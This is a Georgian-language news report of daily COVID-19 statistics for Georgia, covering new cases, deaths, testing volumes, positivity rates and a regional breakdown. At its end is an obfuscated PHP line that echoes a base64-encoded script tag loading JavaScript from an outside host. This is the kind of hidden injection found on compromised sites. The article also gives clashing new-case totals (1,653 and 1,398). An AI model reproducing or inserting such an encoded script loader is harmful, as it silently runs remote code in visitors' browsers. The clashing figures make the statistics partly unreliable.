celsiusi
ავერსი საქკაბელი
ბოლო 24 საათში საქართველოში კორონავირუსით ინფიცირების 1 653 ახალი შემთხვევა გამოვლინდა და გარდაიცვალა 13 ადამიანი. ვირუსისგან გამოჯანმრთელდა კიდევ 466  პირი.
 
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 34 800 კვლევა ტესტით, მათ შორის 18 765 კვლევა ანტიგენის ტესტით და 16 035 PCR ტესტით.
 
რაც შეეხება დადებითობის მაჩვენებელს, 15 ივლისის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 4.75 %, ბოლო 14 დღის მანძილზე – 4.31% ხოლო 7 დღის მანძილზე – 4.67%.
 
დღეს ქვეყანაში გამოვლენილი ინფიცირების 1 398 ახალი შემთხვევა თბილისსა და რეგიონებს შორის შემდეგნაირად ნაწილდება:
 
თბილისი – 980,
აჭარა – 118,
იმერეთი – 155,
ქვემო ქართლი – 96,
შიდა ქართლი – 48,
გურია – 13,
სამეგრელო – ზემო სვანეთი – 72,
კახეთი – 94,
მცხეთა-მთიანეთი – 39,
სამცხე-ჯავახეთი – 20,
რაჭა-ლეჩხუმი და ქვემო სვანეთი – 18.
ამ ეტაპზე ინფიცირების მიმდინარე აქტიური შემთხვევა არის  15 888 , საიდანაც 4 001 ადამიანი მკურნალობს საავადმყოფოში, მძიმე პაციენტია 780, ხელოვნური სუნთქვის აპარატზე იმყოფება 177 პირი.
 
ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა შეადგენს 384 387-ს, პანდემიის გავრცელებიდან დღემდე ვირუსს, ჯამში, 5 516 პირი ემსხვერპლა, ხოლო გამოჯანმრთელებულთა რაოდენობა გაიზარდა 362 957-მდე.
1070
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");